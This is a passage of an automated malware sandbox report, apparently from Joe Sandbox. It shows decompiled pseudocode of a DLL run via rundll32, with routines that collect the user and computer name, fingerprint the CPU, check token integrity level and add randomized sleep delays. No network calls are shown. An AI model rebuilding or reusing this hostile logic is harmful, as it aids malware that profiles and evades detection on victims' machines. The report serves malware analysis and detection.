                                                  				_t27 = __edx;
                                                  				_t12 =  &_v12;
                                                  				GetSystemTimeAsFileTime(_t12);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v8);
                                                  				_push(_v12);
                                                  				L04B3B0C2();
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				_t13 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t5 = _t13 + 0x4b3e862; // 0x6af8e0a
                                                  				_t6 = _t13 + 0x4b3e59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
                                                  				L04B3AD5A();
                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x4b3d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0) {
                                                  					_t28 = GetLastError();
                                                  				} else {
                                                  					if(GetLastError() == 0xb7) {
                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
                                                  					} else {
                                                  						_t28 = 2;
                                                  						L6:
                                                  						CloseHandle(_t30);
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}













Line addresses: 0x04b31b2f 0x04b31b37 0x04b31b3b 0x04b31b41 0x04b31b46 0x04b31b4b 0x04b31b4e 0x04b31b51 0x04b31b56 0x04b31b57 0x04b31b5a 0x04b31b5f 0x04b31b66 0x04b31b70 0x04b31b72 0x04b31b73 0x04b31b76 0x04b31b92 0x04b31b98 0x04b31b9c 0x04b31bea 0x04b31b9e 0x04b31bab 0x04b31bbb 0x04b31bc3 0x04b31bd5 0x04b31bd9 0x00000000 0x00000000 0x04b31bc5 0x04b31bc8 0x04b31bcd 0x04b31bcf 0x04b31bcf 0x04b31bad 0x04b31baf 0x04b31bdb 0x04b31bdc 0x04b31bdc 0x04b31bab 0x04b31bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53,?,?), ref: 04B31B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04B31B51
                                                  • _snwprintf.NTDLL ref: 04B31B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,04B3D2A8,00000004,00000000,00001000,?), ref: 04B31B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53), ref: 04B31BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04B31BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?), ref: 04B31BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53), ref: 04B31BE4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 671ba7ae6397dd3957156cc0308e4cf6bb9f7d8f3abd208c54723654c1aa46f3
                                                  • Instruction ID: eae932dd041cad96732dfeee0afdb1cf8dfa9bf4db873cde84290abc213ad2fc
                                                  • Opcode Fuzzy Hash: 671ba7ae6397dd3957156cc0308e4cf6bb9f7d8f3abd208c54723654c1aa46f3
                                                  • Instruction Fuzzy Hash: 5121D576600208BBD721DFAADC05F8E7BBDEB48752F1541A2F605E7190FB74E9048B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
Basic blocks and edges: 181 4b3269c-4b326b0 182 4b326b2-4b326b7 181->182 183 4b326ba-4b326cc call 4b36b43 181->183 182->183 186 4b32720-4b3272d 183->186 187 4b326ce-4b326de GetUserNameW 183->187 188 4b3272f-4b32746 GetComputerNameW 186->188 187->188 189 4b326e0-4b326f0 RtlAllocateHeap 187->189 191 4b32784-4b327a6 188->191 192 4b32748-4b32759 RtlAllocateHeap 188->192 189->188 190 4b326f2-4b326ff GetUserNameW 189->190 193 4b32701-4b3270d call 4b32496 190->193 194 4b3270f-4b3271e HeapFree 190->194 192->191 195 4b3275b-4b32764 GetComputerNameW 192->195 193->194 194->188 197 4b32766-4b32772 call 4b32496 195->197 198 4b32775-4b3277e HeapFree 195->198 197->198 198->191
                                                  C-Code - Quality: 96%
                                                  			E04B3269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0x4b3d270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E04B36B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0x4b3d278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0x4b3d238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E04B32496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0x4b3d238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0x4b3d238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E04B32496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0x4b3d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
                                                  			}




















Line addresses: 0x04b3269c 0x04b326a4 0x04b326aa 0x04b326ad 0x04b326b0 0x04b326b2 0x04b326b7 0x04b326b7 0x04b326bd 0x04b326bf 0x04b326cc 0x04b3272d 0x04b326ce 0x04b326d3 0x04b326d9 0x04b326de 0x04b326ec 0x04b326f0 0x04b326ff 0x04b32706 0x04b3270d 0x04b3270d 0x04b32718 0x04b32718 0x04b326f0 0x04b326de 0x04b3272f 0x04b32735 0x04b3273f 0x04b32741 0x04b32746 0x04b32755 0x04b32759 0x04b32764 0x04b3276b 0x04b32772 0x04b32772 0x04b3277e 0x04b3277e 0x04b32759 0x04b32787 0x04b32789 0x04b3278c 0x04b3278e 0x04b32791 0x04b32794 0x04b3279e 0x04b327a2 0x04b327a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04B326D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B326EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04B326F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04B323D9), ref: 04B32718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B3273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04B32753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B32760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04B323D9), ref: 04B3277E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 5a0d4005bb3e70ca1ffd35a0e85a7bab5dfa3ef66c73c54326595dd67006dde6
                                                  • Instruction ID: ae474b48408ee61243eaf67d585395966b6bc9084e0bda7a23a94bcfdf01e32e
                                                  • Opcode Fuzzy Hash: 5a0d4005bb3e70ca1ffd35a0e85a7bab5dfa3ef66c73c54326595dd67006dde6
                                                  • Instruction Fuzzy Hash: 8731E976A00205EFEB15DFAADC81A6EF7F9FF48252F1040AAE505D7250EB34ED459B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E04B3924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
                                                  				_v16 = 1;
                                                  				_v20 = 0x2000;
                                                  				if( *0x4b3d25c > 5) {
                                                  					_v16 = 0;
                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                  						_v8 = 0;
                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                  						if(_v8 != 0) {
                                                  							_t46 = E04B32049(_v8);
                                                  							if(_t46 != 0) {
                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                  								if(_t33 != 0) {
                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                  								}
                                                  								E04B39039(_t46);
                                                  							}
                                                  						}
                                                  						CloseHandle(_v12);
                                                  					}
                                                  				}
                                                  				 *_a4 = _v20;
                                                  				return _v16;
                                                  			}









Line addresses: 0x04b3925c 0x04b39263 0x04b3926a 0x04b3927e 0x04b39289 0x04b392a1 0x04b392ae 0x04b392b1 0x04b392b6 0x04b392c1 0x04b392c5 0x04b392d4 0x04b392d8 0x04b392f4 0x04b392f4 0x04b392f8 0x04b392f8 0x04b392fd 0x04b39301 0x04b39307 0x04b39308 0x04b3930f 0x04b39315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04B39281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04B392A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04B392B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 04B39301
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04B392D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04B392DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04B392EC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 8aec6173cf999d9b6789a18a2ec2c78fb7d842f3fea970795029e27c0dc0cc57
                                                  • Instruction ID: a53800d996b3f51f3c90b6776d9962ded4910aa0091fda63bf9411201294cbdc
                                                  • Opcode Fuzzy Hash: 8aec6173cf999d9b6789a18a2ec2c78fb7d842f3fea970795029e27c0dc0cc57
                                                  • Instruction Fuzzy Hash: 8B212CB5900259FFEF019FA6DD84DAEBB79EB44705F0000A6E511A6150C7759E05DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B36A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
                                                  				_t26 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                  				 *0x4b3d238 = _t10;
                                                  				if(_t10 != 0) {
                                                  					 *0x4b3d1a8 = GetTickCount();
                                                  					_t12 = E04B38F10(_a4);
                                                  					if(_t12 == 0) {
                                                  						do {
                                                  							GetSystemTimeAsFileTime( &_v12);
                                                  							_t14 = SwitchToThread();
                                                  							_t23 = _v12.dwHighDateTime;
                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                  							_push(0);
                                                  							_push(9);
                                                  							_push(_t23 >> 7);
                                                  							_push(_t16);
                                                  							L04B3B226();
                                                  							_t33 = _t14 + _t16;
                                                  							_t18 = E04B37E03(_a4, _t33);
                                                  							_t19 = 2;
                                                  							_t25 = _t33;
                                                  							Sleep(_t19 << _t33); // executed
                                                  						} while (_t18 == 1);
                                                  						if(E04B36B96(_t25) != 0) {
                                                  							 *0x4b3d260 = 1; // executed
                                                  						}
                                                  						_t12 = E04B3225B(_t26); // executed
                                                  					}
                                                  				} else {
                                                  					_t12 = 8;
                                                  				}
                                                  				return _t12;
                                                  			}













Line addresses: 0x04b36a56 0x04b36a5c 0x04b36a5d 0x04b36a69 0x04b36a71 0x04b36a76 0x04b36a86 0x04b36a8b 0x04b36a92 0x04b36a94 0x04b36a99 0x04b36a9f 0x04b36aa5 0x04b36aaf 0x04b36ab3 0x04b36ab5 0x04b36aba 0x04b36abb 0x04b36abc 0x04b36ac1 0x04b36ac7 0x04b36ad0 0x04b36ad1 0x04b36ad6 0x04b36adc 0x04b36ae8 0x04b36aea 0x04b36aea 0x04b36af4 0x04b36af4 0x04b36a78 0x04b36a7a 0x04b36a7a 0x04b36afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36A69
                                                  • GetTickCount.KERNEL32 ref: 04B36A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04B3807D,?), ref: 04B36A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B36A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04B36ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36AD6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 706c918936423520f6785625c559f3a1797933a5110a0755d811f4b9737819fb
                                                  • Instruction ID: f69a782cf5501dc5ec741a47c5032e2a70d26f8856e0a629e2e0e772d1ad58de
                                                  • Opcode Fuzzy Hash: 706c918936423520f6785625c559f3a1797933a5110a0755d811f4b9737819fb
                                                  • Instruction Fuzzy Hash: 121182726442007FE724ABB6DC09B5E7BE8EB44752F10456AF905D7180EAB4F8518671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 57%
                                                  			E04B3225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E04B3550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0x4b3d25c; // 0x4000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0x4b3d25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0x4b3d164(0, 2);
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E04B33D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
                                                  					_t26 =  *0x4b3d27c; // 0x1fba5a8
                                                  					if( *0x4b3d25c > 5) {
                                                  						_t8 = _t26 + 0x4b3e5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0x4b3ea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E04B31BF4(_t27, _t27);
                                                  					_t31 = E04B31B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0x4b3d270 =  *0x4b3d270 ^ 0x81bbe65d;
                                                  						_t32 = E04B32049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0x4b3d32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0x4b3d32c; // 0x6af95b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0x4b3d32c; // 0x6af95b0
                                                  							 *_t51 = 0x4b3e836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0x4b3d238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0x4b3d2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0x4b3d25c; // 0x4000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0x4b3d27c; // 0x1fba5a8
                                                  								_t13 = _t58 + 0x4b3e55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4b3c2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E04B3269C( ~_v8 &  *0x4b3d270, 0x4b3d00c); // executed
                                                  								_t42 = E04B34094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E04B396A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E04B36786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E04B33DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0x4b3d160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E04B3A501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B3550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,04B32274,00000000,00000000), ref: 04B3551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04B322F1
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • memset.NTDLL ref: 04B32340
                                                  • RtlInitializeCriticalSection.NTDLL(06AF9570), ref: 04B32351
                                                    • Part of subcall function 04B33DD9: memset.NTDLL ref: 04B33DEE
                                                    • Part of subcall function 04B33DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B33E22
                                                    • Part of subcall function 04B33DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04B33E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04B3237C
                                                  • wsprintfA.USER32 ref: 04B323AC
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 469ad721845535c075d52b5f719fd69bfa4675dbc85de8ed157452997a47489e
                                                  • Instruction ID: 3a1e0559464468bd5ae79e986035a79fbc9d2aab2e0caf0e6c9c6de7ee0c5c0e
                                                  • Opcode Fuzzy Hash: 469ad721845535c075d52b5f719fd69bfa4675dbc85de8ed157452997a47489e
                                                  • Instruction Fuzzy Hash: 65519371A00215ABEF29DBBBDC85A6E77ACEB04707F0444E7E602E7140E678FD448B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 04B31680
                                                  • SysFreeString.OLEAUT32(?), ref: 04B31763
                                                    • Part of subcall function 04B352F9: SysAllocString.OLEAUT32(04B3C2B0), ref: 04B35349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 04B317B7
                                                  • SysFreeString.OLEAUT32(?), ref: 04B317C5
                                                    • Part of subcall function 04B32436: Sleep.KERNELBASE(000001F4), ref: 04B3247E
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 7170ea03b02540327944b7364accc586c52b2df1ba97948e3beee06963feb4fe
                                                  • Instruction ID: 80cdaa8e15b9462830b6a074ac2a17ef71d745bf08a4f65da022f6ea9cacdb2c
                                                  • Opcode Fuzzy Hash: 7170ea03b02540327944b7364accc586c52b2df1ba97948e3beee06963feb4fe
                                                  • Instruction Fuzzy Hash: 2B5141B6900209EFDB10DFEDC8848AEB7BAFF88341B198969E505EB210D775AD45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 04B33B46
                                                  • SysAllocString.OLEAUT32(04B31885), ref: 04B33B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B33B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B33BAB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: cadc93eae3913b00351055a51c0dfbff282d7db46d6a79dbe2fdef37b97aa3d2
                                                  • Instruction ID: 2fc53d45df7f03e12707e680a061b690c662e2f7efc5c9ca76e82e86c185da3f
                                                  • Opcode Fuzzy Hash: cadc93eae3913b00351055a51c0dfbff282d7db46d6a79dbe2fdef37b97aa3d2
                                                  • Instruction Fuzzy Hash: 5631EF76900109EFCB05DF99D4C48AE7BF5FF48342B1084AEF90AA7210E735A945CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 360 4b394a9-4b394bc 361 4b394c3-4b394c7 StrChrA 360->361 362 4b394c9-4b394da call 4b32049 361->362 363 4b394be-4b394c2 361->363 366 4b3951f 362->366 367 4b394dc-4b394e8 StrTrimA 362->367 363->361 369 4b39521-4b39528 366->369 368 4b394ea-4b394f3 StrChrA 367->368 370 4b39505-4b39511 368->370 371 4b394f5-4b394ff StrTrimA 368->371 370->368 372 4b39513-4b3951d 370->372 371->370 372->369
                                                  C-Code - Quality: 53%
                                                  			E04B394A9(char* __eax) {
                                                  				char* _t8;
                                                  				intOrPtr _t12;
                                                  				char* _t21;
                                                  				signed int _t23;
                                                  				char* _t24;
                                                  				signed int _t26;
                                                  				void* _t27;
                                                  
                                                  				_t21 = __eax;
                                                  				_push(0x20);
                                                  				_t23 = 1;
                                                  				_push(__eax);
                                                  				while(1) {
                                                  					_t8 = StrChrA();
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t23 = _t23 + 1;
                                                  					_push(0x20);
                                                  					_push( &(_t8[1]));
                                                  				}
                                                  				_t12 = E04B32049(_t23 << 2);
                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                  				if(_t12 != 0) {
                                                  					StrTrimA(_t21, 0x4b3c2a4); // executed
                                                  					_t26 = 0;
                                                  					do {
                                                  						_t24 = StrChrA(_t21, 0x20);
                                                  						if(_t24 != 0) {
                                                  							 *_t24 = 0;
                                                  							_t24 =  &(_t24[1]);
                                                  							StrTrimA(_t24, 0x4b3c2a4);
                                                  						}
                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                  						_t26 = _t26 + 1;
                                                  						_t21 = _t24;
                                                  					} while (_t24 != 0);
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
